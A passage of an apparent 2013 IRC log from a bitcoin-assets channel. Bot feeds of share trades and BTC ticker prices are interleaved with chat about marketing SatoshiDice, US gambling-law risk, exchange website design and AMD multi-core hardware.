[MPEX] [S.DICE] 1200 @ 0.00590933 = 7.0912 BTC [-] Feb 07 16:38:12 [MPEX] [S.DICE] 565 @ 0.00590933 = 3.3388 BTC [-] Feb 07 16:38:13 [MPEX] [S.DICE] 35 @ 0.00598704 = 0.2095 BTC [+] Feb 07 16:38:36 [MPEX] [S.MPOE] 4000 @ 0.00067926 = 2.717 BTC [-] Feb 07 16:41:35 [HAVELOCK] [SDICE] 10 @ 0.63 = 6.3 BTC [-] Feb 07 16:41:36 [HAVELOCK] [SDICE] 2 @ 0.621 = 1.242 BTC [-] Feb 07 16:41:38 [HAVELOCK] [SDICE] 5 @ 0.62 = 3.1 BTC [-] Feb 07 16:41:39 [HAVELOCK] [SDICE] 1 @ 0.61 BTC [-] Feb 07 16:41:40 [HAVELOCK] [SDICE] 2 @ 0.6 = 1.2 BTC [-] Feb 07 16:41:41 [HAVELOCK] [SDICE] 4 @ 0.6 = 2.4 BTC [-] Feb 07 16:41:51 [MPEX] [S.MPOE] 2252 @ 0.00068567 = 1.5441 BTC [+] Feb 07 16:41:51 [MPEX] [S.MPOE] 2800 @ 0.00068718 = 1.9241 BTC [+] Feb 07 16:41:53 [MPEX] [S.MPOE] 4321 @ 0.00068898 = 2.9771 BTC [+] Feb 07 16:41:55 [MPEX] [S.MPOE] 3827 @ 0.00068899 = 2.6368 BTC [+] Feb 07 16:43:05 lol https://btcto.com/ canadians have some serious apologizing to do to burnside Feb 07 16:43:20 why's that ? Feb 07 16:43:36 too close to http://btct.co Feb 07 16:44:03 its all of canadians faults? Feb 07 16:44:05 [MPEX] [S.MPOE] 321 @ 0.00067926 = 0.218 BTC [-] Feb 07 16:44:13 [MPEX] [S.MPOE] 4321 @ 0.00067923 = 2.935 BTC [-] Feb 07 16:44:15 [MPEX] [S.MPOE] 4258 @ 0.00067922 = 2.8921 BTC [-] Feb 07 16:44:19 it's running joke on reddit Feb 07 16:44:26 hah Feb 07 16:44:27 that canadians always apologize Feb 07 16:44:38 oh, sorry didnt realize... Feb 07 16:44:40 :) Feb 07 16:45:01 lol email transfers Feb 07 16:45:06 and cheques Feb 07 16:45:11 uhh huh that'll last long Feb 07 16:45:25 as any major player has already realized, email transfers = fraud Feb 07 16:45:31 eg. virtex, canadianbitcoins Feb 07 16:45:41 but good luck to them Feb 07 16:45:49 when teh banks freeze their accounts for 2 weeks, itll be fun Feb 07 16:47:44 [MPEX] [S.MPOE] 4321 @ 0.00068878 = 2.9762 BTC [+] Feb 07 16:47:46 [MPEX] [S.MPOE] 2129 @ 0.00068899 = 1.4669 BTC [+] Feb 07 16:51:34 [HAVELOCK] [SDICE] 3 @ 0.649 = 1.947 BTC [+] Feb 07 16:52:12 [MPEX] [S.DICE] 29 @ 0.00598704 = 0.1736 BTC [+] Feb 07 16:52:14 [MPEX] [S.DICE] 471 @ 0.00606924 = 2.8586 BTC [+] Feb 07 16:55:21 Interesting article on how soccer is f'ed. Feb 07 16:55:22 http://www.grantland.com/story/_/id/8924593/match-fixing-soccer Feb 07 16:55:35 ;;ticker Feb 07 16:55:36 BTCUSD ticker | Best bid: 21.41101, Best ask: 21.53899, Bid-ask spread: 0.12798, Last trade: 21.41101, 24 hour volume: 41898.14339840, 24 hour low: 20.77002, 24 hour high: 21.53900, 24 hour vwap: 21.21666 Feb 07 16:55:44 noice Feb 07 16:58:49 21.60 Feb 07 17:08:39 [MPEX] [S.MPOE] 4321 @ 0.00067938 = 2.9356 BTC [-] Feb 07 17:08:41 [MPEX] [S.MPOE] 608 @ 0.00067922 = 0.413 BTC [-] Feb 07 17:09:36 [MPEX] [S.MPOE] 4348 @ 0.00067922 = 2.9532 BTC [-] Feb 07 17:09:38 [MPEX] [S.MPOE] 1852 @ 0.00067921 = 1.2579 BTC [-] Feb 07 17:11:16 [MPEX] [S.MPOE] 10300 @ 0.00067921 = 6.9959 BTC [-] Feb 07 17:13:00 ;;ticker Feb 07 17:13:03 BTCUSD ticker | Best bid: 21.69000, Best ask: 21.87000, Bid-ask spread: 0.18000, Last trade: 21.87999, 24 hour volume: 45113.46106970, 24 hour low: 20.77002, 24 hour high: 21.87999, 24 hour vwap: 21.25330 Feb 07 17:13:42 [MPEX] [S.MPOE] 3800 @ 0.00068649 = 2.6087 BTC [+] Feb 07 17:13:44 [MPEX] [S.MPOE] 4321 @ 0.00068882 = 2.9764 BTC [+] Feb 07 17:13:46 [MPEX] [S.MPOE] 4579 @ 0.00068899 = 3.1549 BTC [+] Feb 07 17:17:58 [MPEX] [S.MPOE] 3250 @ 0.00067933 = 2.2078 BTC [-] Feb 07 17:17:58 YAH! Feb 07 17:18:04 ;;ticker Feb 07 17:18:08 BTCUSD ticker | Best bid: 21.88000, Best ask: 21.90000, Bid-ask spread: 0.02000, Last trade: 21.78100, 24 hour volume: 48213.18622376, 24 hour low: 20.77002, 24 hour high: 22.00000, 24 hour vwap: 21.30338 Feb 07 17:18:20 $22.00 Feb 07 17:20:53 [MPEX] [S.MPOE] 1071 @ 0.00067933 = 0.7276 BTC [-] Feb 07 17:20:55 [MPEX] [S.MPOE] 8729 @ 0.00067921 = 5.9288 BTC [-] Feb 07 17:22:50 so Feb 07 17:23:04 I imagine every avalon has infact been sold Feb 07 17:25:25 at least once Feb 07 17:26:20 well, somewhere on the forums Feb 07 17:26:29 they added up all the money from the block chain Feb 07 17:26:36 and it seems to come to all the units Feb 07 17:39:50 [MPEX] [S.DICE] 91 @ 0.00606924 = 0.5523 BTC [+] Feb 07 17:39:50 !ticker m s.bbet Feb 07 17:39:51 [MPEX:S.BBET] 1D: 0.0003 / 0.00086343 / 0.0011001 (19000 shares, 16.41 BTC), 7D: 0.0003 / 0.00091743 / 0.0015999 (20957 shares, 19.23 BTC), 30D: 0.0003 / 0.00080035 / 0.0035 (2360520 shares, 1,889.27 BTC) Feb 07 17:39:51 [MPEX] [S.DICE] 609 @ 0.00607973 = 3.7026 BTC [+] Feb 07 17:39:54 Somewhere on the forums, they also solved world peace. Feb 07 17:39:58 wow s.bbet tanked Feb 07 17:41:11 imsaguy: yeah I wish =/ Feb 07 17:43:05 [MPEX] [S.MPOE] 3780 @ 0.00067921 = 2.5674 BTC [-] Feb 07 17:49:43 [MPEX] [S.MPOE] 5339 @ 0.00067921 = 3.6263 BTC [-] Feb 07 17:49:45 [MPEX] [S.MPOE] 5811 @ 0.00067915 = 3.9465 BTC [-] Feb 07 17:56:22 everyone should upvote this: http://www.reddit.com/r/IAmA/comments/182fth/i_am_matt_taibbi_politics_writer_for_rolling/c8azhpr Feb 07 18:01:35 [MPEX] [S.MPOE] 4321 @ 0.00068435 = 2.9571 BTC [+] Feb 07 18:01:37 [MPEX] [S.MPOE] 7829 @ 0.00068443 = 5.3584 BTC [+] Feb 07 18:03:19 hi mjr_ Feb 07 18:03:34 hi all Feb 07 18:03:40 hi awkorama Feb 07 18:03:42 what's new Feb 07 18:04:02 not much, gathering together a team for my project now, so things are going well Feb 07 18:04:51 awesome Feb 07 18:04:57 i am doing pretty much the same thing Feb 07 18:05:01 it's going well Feb 07 18:05:19 is your project public? as in public in #bitcoin-assets ? Feb 07 18:06:10 awkorama didnt say thanks for answering my questions earlier Feb 07 18:07:49 no problem 1NYKTuqupnichX9ue91fcLhZohJvwzn43x Feb 07 18:09:18 [MPEX] [S.MPOE] 5271 @ 0.00068443 = 3.6076 BTC [+] Feb 07 18:09:19 [MPEX] [S.MPOE] 4321 @ 0.00068485 = 2.9592 BTC [+] Feb 07 18:09:21 [MPEX] [S.MPOE] 4647 @ 0.00068486 = 3.1825 BTC [+] Feb 07 18:11:20 [MPEX] [S.MPOE] 4789 @ 0.00067915 = 3.2524 BTC [-] Feb 07 18:11:21 [MPEX] [S.MPOE] 3561 @ 0.00067914 = 2.4184 BTC [-] Feb 07 18:14:16 [MPEX] [S.MPOE] 2384 @ 0.00068486 = 1.6327 BTC [+] Feb 07 18:15:30 is there a bitfunder ticker? Feb 07 18:16:04 no Feb 07 18:18:28 https://bitcointalk.org/index.php?topic=99497.new;topicseen#new Feb 07 18:18:30 holy shit Feb 07 18:18:36 is it possible to move shares from bitfunder to havelock? Feb 07 18:18:49 DeadWeasel: why bother, the only good exchange is bitfunder Feb 07 18:18:53 [MPEX] [S.MPOE] 2669 @ 0.00068486 = 1.8279 BTC [+] Feb 07 18:18:55 [MPEX] [S.MPOE] 4321 @ 0.00068492 = 2.9595 BTC [+] Feb 07 18:18:57 [MPEX] [S.MPOE] 2200 @ 0.00068493 = 1.5068 BTC [+] Feb 07 18:18:58 [MPEX] [S.MPOE] 2010 @ 0.00068899 = 1.3849 BTC [+] Feb 07 18:20:11 Diablo-D3: i beg to differ Feb 07 18:20:20 request denied. Feb 07 18:20:21 DeadWeasel: yes, we'll accept incoming shares at havelock from other exchanges Feb 07 18:21:31 ok, thanks topace Feb 07 18:23:59 evoorhees, hows this last tranche doing? Feb 07 18:24:05 ;) Feb 07 18:25:13 lol Feb 07 18:25:37 think it will get absorbed over the next few weeks? Feb 07 18:25:44 last one sold in 30 seconds, this one not a share was touched Feb 07 18:26:05 sdice shares are paralyzed Feb 07 18:26:37 good fun! Feb 07 18:26:49 ;;ticker Feb 07 18:26:50 BTCUSD ticker | Best bid: 21.97001, Best ask: 22.00000, Bid-ask spread: 0.02999, Last trade: 21.90001, 24 hour volume: 52597.09968634, 24 hour low: 20.77002, 24 hour high: 22.07000, 24 hour vwap: 21.37718 Feb 07 18:26:52 it's okay, at the end of the day if they don't sell I get the dividends Feb 07 18:26:57 nice Feb 07 18:26:58 5MM BTC at ~.006 is on the order of 10MM at original IPO, and much higher in $ terms due to exchange rate movement. Maybe it's not that suprising in retrospect. Feb 07 18:27:15 yeah that's a fair point Feb 07 18:27:32 I thought .0062 would sell through though Feb 07 18:27:42 with stall at 4th tranche Feb 07 18:27:55 yeah me too Feb 07 18:28:05 need some Satoshi Dice media frenzy. go generate some! Feb 07 18:28:09 fuckin market likes to play tricks on people Feb 07 18:28:32 [MPEX] [S.MPOE] 760 @ 0.00067914 = 0.5161 BTC [-] Feb 07 18:28:34 [MPEX] [S.MPOE] 6123 @ 0.00067913 = 4.1583 BTC [-] Feb 07 18:29:00 how's this for media... http://www.npr.org/blogs/alltechconsidered/2013/02/06/171182974/is-online-gambling-legal-if-bitcoins-not-dollars-are-at-stake Feb 07 18:29:02 [BTCTC] [GSDPT] 337 @ 0.0062 = 2.0894 BTC [+] Feb 07 18:29:14 SatoshiDice was on NPR yesterday Feb 07 18:29:40 nice Feb 07 18:29:56 excellent! Feb 07 18:30:32 sooo... probably 500,000 people heard of it yesterday Feb 07 18:31:07 well, those people never heard of bitcoin before. So it's a big jump just to get BTCs then to even consider buying an SDICE share... Feb 07 18:32:11 bet they wont know how sdice works still Feb 07 18:32:34 evoorhees when can we expect the utube? Feb 07 18:32:41 it would be weeks and weeks before any change is seen, then it is indistinguishable from other market movements. Feb 07 18:32:44 interesting. Feb 07 18:33:12 oh haha I don't think those people will be bying s.dice shares anytime soon Feb 07 18:33:28 but they are hearing about bitcoin, that's for sure Feb 07 18:33:41 [MPEX] [S.DICE] 623 @ 0.00607973 = 3.7877 BTC [+] Feb 07 18:33:43 [MPEX] [S.DICE] 1000 @ 0.0061948 = 6.1948 BTC [+] Feb 07 18:33:44 [MPEX] [S.DICE] 5000 @ 0.0061949 = 30.9745 BTC [+] Feb 07 18:33:46 [MPEX] [S.DICE] 4153 @ 0.00619999 = 25.7486 BTC [+] Feb 07 18:33:59 but those with BTCs already might. I think there needs to be a cleaner version of your monthly profit and associate dividends. Feb 07 18:34:07 half-marketing half accounting. Feb 07 18:34:10 in pretty pretty format. Feb 07 18:34:16 to bring in those on the fence. Feb 07 18:34:22 get people to talk about their dividends Feb 07 18:34:34 how can the monthly profit be cleaner? it's an easy google spreadsheet available to all Feb 07 18:34:50 You know, fonts, colors, make it look professional. Feb 07 18:35:06 grab a NYSE pdf of their numbers, steal some formatting etc Feb 07 18:35:15 or put it on a web page instead of a sheet Feb 07 18:35:21 exactly. Feb 07 18:35:24 and make the sheet available as link on that page Feb 07 18:35:35 also show daily reports Feb 07 18:35:40 the professional touch is not to be underestimated. people subconscious make more of the decision Feb 07 18:35:48 they feel safe with professional looking documents Feb 07 18:35:55 project profit would be good too Feb 07 18:36:01 projected* Feb 07 18:36:06 with pretty graphs. Feb 07 18:36:46 projected dividend too Feb 07 18:36:49 [BTCTC] [BASIC-MINING] 4 @ 0.349 = 1.396 BTC [-] Feb 07 18:36:54 that's what people want anyway Feb 07 18:36:55 but only if you want to convert those heathen nonbelievers Feb 07 18:36:58 yup Feb 07 18:36:59 no I agree, you're absolutely right about that Feb 07 18:37:00 to count their imaginary future money Feb 07 18:37:28 nominate deadweasel to do the utube! Feb 07 18:37:32 I'm a marketing guy, so i understand that Feb 07 18:37:39 play to the subconscious. :) Feb 07 18:37:56 but, I don't want to be marketing the s.dice asset over and above what it's legitimately worth, if that makes sense Feb 07 18:38:04 I've seen you in videos and on interviews, you can talk the talk. Feb 07 18:38:05 I don't want to puff it up Feb 07 18:38:24 I'd rather it sit just below market value, than puff up a bubble with some marketing tricks int he presentation Feb 07 18:38:27 these two lines combines make no sense at all Feb 07 18:38:34 you don't have to lie, just make the truth pretty and digestible. Feb 07 18:38:45 yea in like 5 minutes Feb 07 18:39:00 how to sdice Feb 07 18:39:05 you're right, you should prepare all this and dump it out there when you get another media bubble. Feb 07 18:39:17 all linked and fresh and prety with graphs and whatnot. Feb 07 18:39:21 they will eat it up. Feb 07 18:39:25 NOM NOM NOM Feb 07 18:39:28 no I'm saying I don't want to do that Feb 07 18:39:35 I don't want to make the asset frothy Feb 07 18:39:56 at this point i'm more interested in dice players than investors Feb 07 18:39:58 briefly mention it at the end of video? Feb 07 18:40:04 I think we all know how easily people dump money into unsubstantiated "opportunities" in bitcoin Feb 07 18:40:13 no doubt Feb 07 18:40:19 thickasthieves - yes, precisely Feb 07 18:40:23 you're right, players are more important Feb 07 18:40:25 I'd rather be marketing the game Feb 07 18:40:40 i haven't even seen it since the revamp Feb 07 18:40:46 not gonna look at work either. Feb 07 18:41:00 that way, when us long investors are ready to take profits from sellin shares, investors will be paying a lot more Feb 07 18:41:18 betting volume is the only thing that matters Feb 07 18:41:47 plenty of people know about s.dice that have plenty of coin Feb 07 18:42:08 i also dont care about whales Feb 07 18:42:17 they are nice n all, but they come with risk too Feb 07 18:42:19 focusing on building the player base is probably the most important thing to focus on Feb 07 18:42:21 it was the thrill that got me to spend my first few BTCs on sdice. the frenzy inside that drove me. Feb 07 18:42:31 [BTCTC] [BASIC-MINING] 8 @ 0.3498 = 2.7984 BTC [+] Feb 07 18:42:31 and you can make more stable money from 100 small timers Feb 07 18:42:32 you gotta catch new players when they buy their first BTCs. Feb 07 18:42:47 maybe work with wallet services to market you to new accounts. that would be sweet. Feb 07 18:43:05 your blockchain.info one is great, that thing is a BTC sucubus Feb 07 18:43:06 yeah, i do think the POV is, teach gamblers about bitcoin thru sdice, not the reverse Feb 07 18:43:34 boo we dont need marketing, we need a utube how to! Feb 07 18:43:37 [11:35:36] the professional touch is not to be underestimated. people subconscious make more of the decision Feb 07 18:43:38 that's true, the ones driven away by the US laws. Feb 07 18:43:44 ^ that was our thought process as we developed havelock Feb 07 18:43:48 we weanted it to LOOK professional Feb 07 18:43:51 give them a happy home before the other sites get organized and into BTC Feb 07 18:43:56 not look like mpex :p (no offense mp ) Feb 07 18:44:00 you did good topace Feb 07 18:44:23 topace: true, my first purchases were all at havelock because it was the easiest exchange to find and understand how to use Feb 07 18:44:30 [MPEX] [S.MPOE] 2027 @ 0.00067913 = 1.3766 BTC [-] Feb 07 18:44:32 [MPEX] [S.MPOE] 4321 @ 0.0006791 = 2.9344 BTC [-] Feb 07 18:44:34 [MPEX] [S.MPOE] 9750 @ 0.00067878 = 6.6181 BTC [-] Feb 07 18:44:35 bitfunder does look nice tho Feb 07 18:44:38 ThickAsThieves: awesome good to hear! Feb 07 18:44:38 [MPEX] [S.MPOE] 3100 @ 0.00067877 = 2.1042 BTC [-] Feb 07 18:44:39 [MPEX] [S.MPOE] 27626 @ 0.00067854 = 18.7453 BTC [-] Feb 07 18:44:42 BTCTC needs work Feb 07 18:44:59 it looks "old" Feb 07 18:45:57 make sdice website better for starters Feb 07 18:45:58 no offense, if the creator is reading ;) Feb 07 18:46:55 what about putting bitcoin: links on the addresses on the home page? Feb 07 18:47:05 that's the first thing i tried to do Feb 07 18:47:07 if anyone can make me a utube vid for sdice, please pm me Feb 07 18:47:31 evoorhees: so, 4th tranche? gonna hold off for a bit ? Feb 07 18:47:34 can i have video veto power? Feb 07 18:47:41 until last nights gets gobbled up? Feb 07 18:48:08 I do graphics and some sound design, no video though Feb 07 18:48:47 u could do talking Feb 07 18:49:37 I could probably record the voiceover in my studio if I had a script Feb 07 18:49:46 yeah 4th tranche is on hold for now Feb 07 18:50:09 to write a script i would need to know what it was about.. Feb 07 18:50:23 well actually - I only want someone to do a vid if that person is really experienced with it. Feb 07 18:50:26 want it to be professional Feb 07 18:50:29 agreed Feb 07 18:50:42 not sure that person will be hangin out in the bitcoin-assets channel ;) Feb 07 18:50:59 oh now who is being picky Feb 07 18:51:11 i could do respectable graphics, but no I can't help with vid Feb 07 18:51:54 plus you have the money to hire a whole firm Feb 07 18:52:45 get a college intern with a nice camera, youll find them in the AV club Feb 07 18:52:50 yea hire a proper webdesigner.. Feb 07 18:52:55 will work for beans Feb 07 18:53:24 before this epic video Feb 07 18:53:45 I don't mind the current website Feb 07 18:53:59 other than how the background img isnt large enough Feb 07 18:54:00 i do.. Feb 07 18:54:30 truffles - link a good website, Id' like to see your preference Feb 07 18:54:43 social media buttons could be bette rplaced, but maybe they get used more in that spot Feb 07 18:54:46 oh im way too picky Feb 07 18:54:50 but must not have clutter Feb 07 18:55:06 needs examples, go find one! :) Feb 07 18:55:19 let me see.. Feb 07 18:55:21 yeah I want example Feb 07 18:55:38 of cluttery? Feb 07 18:55:58 not shit examples, pro examples. Feb 07 18:56:51 def puts me on the spot, i visit a lotta shit websites lol Feb 07 18:56:57 i get to voice my dislike here Feb 07 18:56:59 im looking though Feb 07 18:57:24 heh, if i google "gamble online" first return is "FBI — Online Gambling Is Illegal" Feb 07 18:58:45 hahaha Feb 07 18:59:49 [MPEX] [S.DICE] 5000 @ 0.00619999 = 31 BTC [+] Feb 07 19:00:23 yeesh, are there any good looking gambling sites? Feb 07 19:00:40 pokerstars? Feb 07 19:01:29 not ugly, but lifeless Feb 07 19:01:35 (pokerstars) Feb 07 19:01:39 [MPEX] [S.MPOE] 4321 @ 0.00067874 = 2.9328 BTC [+] Feb 07 19:01:41 [MPEX] [S.MPOE] 8207 @ 0.00067854 = 5.5688 BTC [-] Feb 07 19:01:57 Seals with clubs? :D Feb 07 19:02:10 oh no too much clutter on there Feb 07 19:02:43 what other types of sites have to show a spreadsheet on the home page? Feb 07 19:03:10 the how to page on sdice is okay, the main page too much green Feb 07 19:03:36 lol the how to is just typography Feb 07 19:04:02 http://www.thewildernessdowntown.com/ Feb 07 19:04:36 [HAVELOCK] [SDICE] 48 @ 0.6255 = 30.024 BTC [-] Feb 07 19:04:38 [HAVELOCK] [SDICE] 2 @ 0.625 = 1.25 BTC [-] Feb 07 19:04:43 neat, but how would that translate? Feb 07 19:05:17 doesnt have to be as good as that Feb 07 19:07:57 nnakdkfkfk Feb 07 19:09:30 after looking for a bit, sdice site has a better design than so many gambling related sites Feb 07 19:09:51 but it just looks cheap.. Feb 07 19:15:02 cant find any other examples i forum too much Feb 07 19:17:07 http://imagecrab.com/ cool : ) Feb 07 19:19:12 ervoorhees: what's in the pipeline in terms of s.dice marketing? Feb 07 19:19:56 'evoorhees' that is Feb 07 19:20:52 honestly it's getting way more marketing than I want, currently Feb 07 19:21:18 don't like all the attention? Feb 07 19:21:34 I'll figure out some excellent marketing for it, but not until I've gotten some good legal advice on how to protect this thing Feb 07 19:21:40 right Feb 07 19:21:43 preventive steps to not get doj-ed? Feb 07 19:21:55 would be bad for my investors if I got it super popular only to have it shut down Feb 07 19:21:58 yeah Feb 07 19:22:05 I think that's the most important thing right now Feb 07 19:22:12 I have a feeling your lawyer is going to say "you're doing WHAT?!" Feb 07 19:22:17 just dont fly to merica Feb 07 19:22:52 no, he should fly out of america tout de suite Feb 07 19:22:55 :) Feb 07 19:23:08 there are US citizens and companies that operate online gambling businesses, but it has to be domiciled properly, usually licensed properly, and has to comply with some rules Feb 07 19:23:09 lives there now? Feb 07 19:23:13 gtfo asap? Feb 07 19:23:16 so that's what I'm in the process of exploring Feb 07 19:24:50 but ure in ireland or something right Feb 07 19:25:07 SatoshiDice is in ireland Feb 07 19:25:20 yea but are u there too Feb 07 19:25:25 no Feb 07 19:25:33 merica? Feb 07 19:25:37 merica Feb 07 19:25:41 oh boy Feb 07 19:26:02 You haven't converted a dime of the won BTC to fiat, correct? Feb 07 19:26:05 land of the free Feb 07 19:26:09 correct Feb 07 19:26:38 That's definitely smart Feb 07 19:26:47 if u were just a regular employee dont think it matters, but if ure the face maybe Feb 07 19:26:50 until you develop a game plan Feb 07 19:27:19 because you can still argue that it's just play tokens Feb 07 19:27:26 [MPEX] [S.MPOE] 4321 @ 0.00068258 = 2.9494 BTC [+] Feb 07 19:27:27 [MPEX] [S.MPOE] 9679 @ 0.00068262 = 6.6071 BTC [+] Feb 07 19:28:50 If this uncertainty didn't exist, I wouldn't care if the share price was 0.0001, because I could be confident that I'd extract dividends for years Feb 07 19:29:35 thus me seeking legal advice ;) Feb 07 19:31:16 free advice right here, leave merica.. Feb 07 19:34:24 My free advice (more of a longing): redirect satoshidice.com to satoshidice.ie or some other domain while you still can. The website being seized will spook a lot of existing players away. Feb 07 19:34:25 Even SE-Asia is better for that kind of business. In Europe look into Switzerland, Liechtenstein, Monaco etc. Feb 07 19:35:07 some other non-US controlled TLD I should say Feb 07 19:35:32 The USA is in a bad state, the IRS and its jack-booted thugs might not care if what zou do is legal if it even is a bit dubious Feb 07 19:35:34 [MPEX] [S.MPOE] 2435 @ 0.00068262 = 1.6622 BTC [+] Feb 07 19:35:35 [MPEX] [S.MPOE] 4321 @ 0.00068299 = 2.9512 BTC [+] Feb 07 19:35:36 [MPEX] [S.MPOE] 1444 @ 0.000683 = 0.9863 BTC [+] Feb 07 19:35:43 you* Feb 07 19:40:06 [MPEX] [S.MPOE] 4321 @ 0.00068207 = 2.9472 BTC [-] Feb 07 19:40:13 [MPEX] [S.MPOE] 4887 @ 0.00068181 = 3.332 BTC [-] Feb 07 19:42:58 [MPEX] [S.MPOE] 4321 @ 0.00068183 = 2.9462 BTC [+] Feb 07 19:43:00 [MPEX] [S.MPOE] 4646 @ 0.00068181 = 3.1677 BTC [-] Feb 07 19:44:06 [MPEX] [S.MPOE] 31331 @ 0.00068181 = 21.3618 BTC [-] Feb 07 19:44:15 [MPEX] [S.MPOE] 769 @ 0.00068023 = 0.5231 BTC [-] Feb 07 19:45:00 [MPEX] [S.MPOE] 4321 @ 0.00068292 = 2.9509 BTC [+] Feb 07 19:45:02 [MPEX] [S.MPOE] 329 @ 0.000683 = 0.2247 BTC [+] Feb 07 19:45:48 -hustler I started at https://bitcointalk.org/index.php?topic=124441.0 I used pgp, and have not yet registered a BTC address. I don't know if I have to re-authenticate each login or not. There is a lot of info to assimilate, and I'm not there yet. Feb 07 19:46:02 ^ someone quoted a MPO-PR post in -otc Feb 07 19:46:30 i call paradox Feb 07 19:50:51 [MPEX] [S.MPOE] 4321 @ 0.00068274 = 2.9501 BTC [-] Feb 07 19:50:53 [MPEX] [S.MPOE] 3679 @ 0.000683 = 2.5128 BTC [+] Feb 07 20:04:20 [MPEX] [S.MPOE] 4321 @ 0.00068279 = 2.9503 BTC [-] Feb 07 20:04:22 [MPEX] [S.MPOE] 6748 @ 0.000683 = 4.6089 BTC [+] Feb 07 20:04:23 [MPEX] [S.MPOE] 2358 @ 0.00068351 = 1.6117 BTC [+] Feb 07 20:08:19 [MPEX] [S.MPOE] 4025 @ 0.00068894 = 2.773 BTC [+] Feb 07 20:19:02 dumpage Feb 07 20:23:05 [MPEX] [S.MPOE] 9200 @ 0.00068822 = 6.3316 BTC [-] Feb 07 20:31:14 [MPEX] [S.MPOE] 10700 @ 0.00068822 = 7.364 BTC [-] Feb 07 20:32:26 ;;ticker Feb 07 20:32:26 BTCUSD ticker | Best bid: 21.75002, Best ask: 21.84999, Bid-ask spread: 0.09997, Last trade: 21.75001, 24 hour volume: 60296.08920281, 24 hour low: 20.77002, 24 hour high: 22.15000, 24 hour vwap: 21.46847 Feb 07 20:32:48 ;;bc,24hprc Feb 07 20:32:49 21.42 Feb 07 20:34:52 [MPEX] [S.MPOE] 1975 @ 0.00068894 = 1.3607 BTC [+] Feb 07 20:34:54 [MPEX] [S.MPOE] 225 @ 0.00068899 = 0.155 BTC [+] Feb 07 20:35:06 !ticker m s.dice Feb 07 20:35:08 [MPEX:S.DICE] 1D: 0.00590933 / 0.00632497 / 0.00677999 (892420 shares, 5,644.53 BTC), 7D: 0.0042 / 0.0057918 / 0.007395 (3565080 shares, 20,648.26 BTC), 30D: 0.00085848 / 0.00532461 / 0.0075 (8366014 shares, 44,545.81 BTC) Feb 07 20:45:26 [MPEX] [S.MPOE] 1273 @ 0.00068822 = 0.8761 BTC [-] Feb 07 20:45:28 [MPEX] [S.MPOE] 4321 @ 0.00068024 = 2.9393 BTC [-] Feb 07 20:45:29 [MPEX] [S.MPOE] 12294 @ 0.00068023 = 8.3627 BTC [-] Feb 07 20:46:35 [MPEX] [S.MPOE] 1940 @ 0.00068899 = 1.3366 BTC [+] Feb 07 20:46:37 [MPEX] [S.MPOE] 4321 @ 0.0006898 = 2.9806 BTC [+] Feb 07 20:46:39 [MPEX] [S.MPOE] 5739 @ 0.00068981 = 3.9588 BTC [+] Feb 07 20:46:54 !ticker h sdice Feb 07 20:46:56 [HAVELOCK:SDICE] 1D: 0.60000000 / 0.63206115 / 0.68999980 (2551 shares, 1612.38799660 BTC), 7D: 0.52100000 / 0.6591122 / 0.89000000 (6250 shares, 4119.45127865 BTC), 30D: 0.44000000 / 0.62864917 / 0.89000000 (9575 shares, 6019.31583260 BTC) Feb 07 20:50:35 [MPEX] [S.MPOE] 4261 @ 0.00068981 = 2.9393 BTC [+] Feb 07 20:50:37 [MPEX] [S.MPOE] 6889 @ 0.00068982 = 4.7522 BTC [+] Feb 07 20:51:55 Why everyone is selling S.DICE? Feb 07 20:55:21 [MPEX] [S.MPOE] 10250 @ 0.00068982 = 7.0707 BTC [+] Feb 07 20:55:48 everyones not, most people are buying, just lots of fsupply right now with eric dumping 3million shares on the market Feb 07 20:57:59 anyone have a copy of the old bitcoin forum? Feb 07 21:02:53 buy it up Chilca! Feb 07 21:02:58 it's an investment! Feb 07 21:03:32 I don't have more money to buy more!! Feb 07 21:18:44 [MPEX] [S.MPOE] 2866 @ 0.00068913 = 1.975 BTC [-] Feb 07 21:18:46 [MPEX] [S.MPOE] 4321 @ 0.00068358 = 2.9537 BTC [-] Feb 07 21:18:47 [MPEX] [S.MPOE] 11350 @ 0.00068351 = 7.7578 BTC [-] Feb 07 21:18:49 [MPEX] [S.MPOE] 787 @ 0.00068023 = 0.5353 BTC [-] Feb 07 21:18:49 [MPEX] [S.MPOE] 7276 @ 0.00067999 = 4.9476 BTC [-] Feb 07 21:26:12 [06:41] lol https://btcto.com/ canadians have some serious apologizing to do to burnside Feb 07 21:26:14 [06:41] why's that ? Feb 07 21:26:21 [06:42] too close to http://btct.co Feb 07 21:26:23 [06:42] its all of canadians faults? Feb 07 21:26:26 heh Feb 07 21:27:31 I think they're confused. Shoulda been btcto.ca. ;) Feb 07 21:27:36 or btct.ca Feb 07 21:38:39 [MPEX] [S.MPOE] 4321 @ 0.00068963 = 2.9799 BTC [+] Feb 07 21:38:42 [MPEX] [S.MPOE] 3211 @ 0.00068979 = 2.2149 BTC [+] Feb 07 21:39:14 [MPEX] [S.DICE] 8635 @ 0.00619999 = 53.5369 BTC [+] Feb 07 21:42:25 [MPEX] [S.MPOE] 2848 @ 0.00067999 = 1.9366 BTC [-] Feb 07 21:42:26 [MPEX] [S.MPOE] 4321 @ 0.00067904 = 2.9341 BTC [-] Feb 07 21:42:28 [MPEX] [S.MPOE] 831 @ 0.00067903 = 0.5643 BTC [-] Feb 07 21:43:31 [MPEX] [S.MPOE] 490 @ 0.0006792 = 0.3328 BTC [+] Feb 07 21:53:48 [MPEX] [S.MPOE] 4321 @ 0.00068965 = 2.98 BTC [+] Feb 07 21:53:49 [MPEX] [S.MPOE] 2284 @ 0.00068979 = 1.5755 BTC [+] Feb 07 22:05:07 [MPEX] [S.MPOE] 3831 @ 0.0006792 = 2.602 BTC [-] Feb 07 22:05:09 [MPEX] [S.MPOE] 7369 @ 0.00067903 = 5.0038 BTC [-] Feb 07 22:10:44 Diablo-D3: Where in the PDF does it say "4 machines"? Feb 07 22:11:29 the numactl output Feb 07 22:11:31 lists 4 nodes Feb 07 22:11:43 and count the cores, has 32 cores Feb 07 22:11:46 It mentions the word "machine", singular, before that. Feb 07 22:11:57 Right, I am logged into a machine right now with 32 cores, and it's just one machine. Feb 07 22:12:36 in 2010, AMD didnt make a CPU that had 16 cores Feb 07 22:12:37 [HAVELOCK] [SDICE] 3 @ 0.61 = 1.83 BTC [-] Feb 07 22:12:46 and we agree those are 2 socket machines Feb 07 22:12:52 Even the little picture describes a single processor with 16 cores. Feb 07 22:13:20 hyperthreading? Feb 07 22:13:24 Bugpowder: no. Feb 07 22:13:34 AMD has never done hyperthreading Feb 07 22:13:59 AMD skipped that step and just do what Sun and IBM do Feb 07 22:14:30 Dude. If it is significantly slower, and interfering with other CPUs (so the effect is multiplicative), then it is orders of magnitude slower to access remote memory, 